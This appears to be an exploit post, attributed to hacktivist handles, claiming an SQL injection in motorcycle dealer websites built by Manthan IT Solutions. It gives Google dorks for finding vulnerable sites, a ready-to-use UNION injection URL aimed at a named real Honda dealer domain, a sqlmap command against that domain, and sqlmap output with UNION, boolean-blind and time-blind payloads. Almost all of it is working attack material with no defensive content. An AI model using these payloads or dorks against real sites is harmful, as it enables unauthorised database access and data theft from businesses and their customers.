Honda India - SQL Injection Vendor Manthan IT Solutions. tested on BackBox 7 GNU/Linux

Information Exploit :

# Exploit Title : Honda India - Sql Injection

# Google Dork :

- inurl:model.php?id= site:.in

- Powered by Manthan IT Solutions. honda

# Date : 2021.07.10

# Exploit Author :

- Hz3666Ghost

- Indoghostsec

- AnonGhost

- Ghostsec

- cxsecurity.com

# Vendor Homepage: [https://manthanitsolutions.com/]

# Software Link: N/A

# Version: -

# Tested on: BackBox 7

# Remote: yes

# CVE : N/A

Poc Exploit :

/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports

Example Test :

http://www.royalhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports

Example Poc SQLMAP :

sqlmap -u "http://www.royalhonda.in/model.php?id=xblade_01&name=xblade" --dbs

Exploit with SQLMAP :

Parameter: id (GET)

    Type: UNION query

    Title: Generic UNION query (NULL) - 8 columns

    Payload: id=-9544' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qppzq','YHOTRlmjgPdebOdFVBWLWrtTfpWZAmDIFFIbQPUC'),'qkbxq'),NULL-- zKSh&name=xblade

Parameter: name (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=xblade_01&name=xblade' AND 7808=7808 AND 'kDIn'='kDIn

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=xblade_01&name=xblade' AND (SELECT 8044 FROM (SELECT(SLEEP(5)))gSVI) AND 'Srct'='Srct

Login Page : N/A

Video Tutorial

Sumber Exploit : [cxsecurity.com Hz3666Ghost]